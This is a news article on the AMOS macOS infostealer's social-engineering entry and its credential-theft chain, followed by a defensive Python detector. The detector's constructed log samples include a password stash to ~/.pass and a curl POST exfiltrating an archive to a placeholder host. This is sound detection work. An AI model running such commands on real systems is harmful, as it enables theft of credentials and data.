- AMOS relies on users to execute malicious terminal commands themselves
- Sophos MDR identified ClickFix-style social engineering in attacks on macOS
- Half of macOS stealer reports involved AMOS, but Apple is fighting back
Atomic macOS Stealer, also known as AMOS, is a persistent macOS security threat because it does not need sophisticated zero-day vulnerabilities to compromise Apple devices.
Instead, this malware family repeatedly exploits normal user behavior by tricking them into typing a single command into their own Terminal application.
A recent incident investigated by Sophos MDR teams revealed exactly this pattern: a ClickFix-style ruse persuaded a victim to execute a line of malicious code manually.
AMOS uses psychological manipulation over technical exploits
This approach has become increasingly prominent, and researchers have noted similar social engineering tactics in multiple macOS data theft campaigns throughout 2025 and early 2026.
AMOS accounted for nearly 40% of all macOS protection updates deployed by Sophos in 2025, more than double the detection rate of any other macOS malware family during the same period.
Additionally, nearly half of all customer reports of macOS stealers in the past three months involved AMOS or its close variants.
Security companies have tracked this malware-as-a-service operation since at least April 2023, with notable campaigns including a variant called SHAMOS reported by CrowdStrike in August 2025.
In December 2025, Huntress documented infections spreading through poisoned search results related to ChatGPT and Grok conversations.
How malware collects passwords and data
After the initial Terminal command runs a boot script, the malware immediately prompts the user for their macOS system password.
The malicious code then validates this credential locally using a simple directory services command before storing it in a hidden file called .pass within the user’s home directory.
Once the password has been stored, AMOS downloads a secondary payload that removes extended attributes to bypass macOS security warnings.
The stealer also checks whether it is running inside a virtual machine or sandbox environment by querying system_profiler data for flags such as QEMU, VMware or KVM.
The malware then proceeds to collect a wide range of sensitive information, including the macOS keychain database, Firefox and Chrome browser credentials, extension archive files, and local session tokens.
Some variants also deploy fake Ledger Wallet and Trezor Suite apps designed to steal seeds and credentials from cryptocurrency wallets.
All collected files are compressed into a single file using the ditto utility before being transmitted to attacker-controlled servers via curl POST requests.
To maintain long-term access, the malware installs a LaunchDaemon that ensures automatic execution after each system reboot.
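As an added example that is not from the article or from Sophos, the following Python script matches shell-command telemetry (constructed sample lines) against the stages of the chain described above and only flags a host when several distinct stages appear together. The concrete command forms (dscl -authonly, xattr -c, ditto -c, curl -X POST) are my assumptions about how these standard macOS utilities would show up in logs; the article names only the tools.

```python
import re
from typing import Dict, List

# One regex per stage of the chain described in the article. The exact
# invocations are assumptions: the article names the tools, not the flags.
STAGE_PATTERNS = {
    "password_validation": re.compile(r"\bdscl\b.*-authonly"),
    "password_stash":      re.compile(r"(~|/Users/[^/\s]+)/\.pass\b"),
    "xattr_strip":         re.compile(r"\bxattr\b.*\s-(c\w*|d\s+com\.apple\.quarantine)"),
    "vm_check":            re.compile(r"\bsystem_profiler\b.*\b(QEMU|VMware|KVM)\b", re.I),
    "archive":             re.compile(r"\bditto\b.*\s-c"),
    "exfiltration":        re.compile(r"\bcurl\b.*(-X\s*POST|--data|-d\s|-F\s)"),
    "persistence":         re.compile(r"/Library/LaunchDaemons/\S+\.plist"),
}

# Constructed telemetry: one shell command per line, as an EDR might record it.
SAMPLE_LOG = [
    'dscl . -authonly "$USER" "$pw"',
    'echo "$pw" > ~/.pass',
    "xattr -c /tmp/payload",
    "system_profiler SPHardwareDataType | grep -iE 'QEMU|VMware|KVM'",
    "ditto -c -k /tmp/collected /tmp/out.zip",
    'curl -X POST -F "file=@/tmp/out.zip" https://c2.example.invalid/upload',
    "cp /tmp/com.example.update.plist /Library/LaunchDaemons/com.example.update.plist",
]
# Constructed benign activity: an admin clearing quarantine on a download.
BENIGN_LOG = ["xattr -c ~/Downloads/tool.dmg", "ls -la"]


def scan_command_log(lines: List[str]) -> Dict[str, List[int]]:
    """Return {stage: [1-based line numbers]} for each stage seen in the log."""
    hits: Dict[str, List[int]] = {}
    for n, line in enumerate(lines, 1):
        for stage, pat in STAGE_PATTERNS.items():
            if pat.search(line):
                hits.setdefault(stage, []).append(n)
    return hits


def verdict(hits: Dict[str, List[int]], min_stages: int = 3) -> bool:
    """Flag only when several distinct stages co-occur: any single stage
    (xattr, ditto, curl on its own) is ordinary macOS administration."""
    return len(hits) >= min_stages


if __name__ == "__main__":
    print(scan_command_log(SAMPLE_LOG), verdict(scan_command_log(SAMPLE_LOG)))
    print(scan_command_log(BENIGN_LOG), verdict(scan_command_log(BENIGN_LOG)))
```

The threshold deliberately trades a little sensitivity for far fewer false positives; tuning it per environment is the real work.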
Despite the seriousness of AMOS, it’s worth asking whether security vendors are overstating its novelty, given that infostealers have been targeting Windows systems for nearly two decades.
The malware’s heavy reliance on user consent (someone must voluntarily paste and execute a Terminal command) creates a major barrier that technically literate users could easily avoid.
Additionally, Apple’s continued improvements to Gatekeeper, XProtect, and notarization requirements could render AMOS largely ineffective with a few OS updates.
The real danger may lie less in AMOS itself and more in the uncomfortable truth that no platform is immune to users who ignore basic security warnings.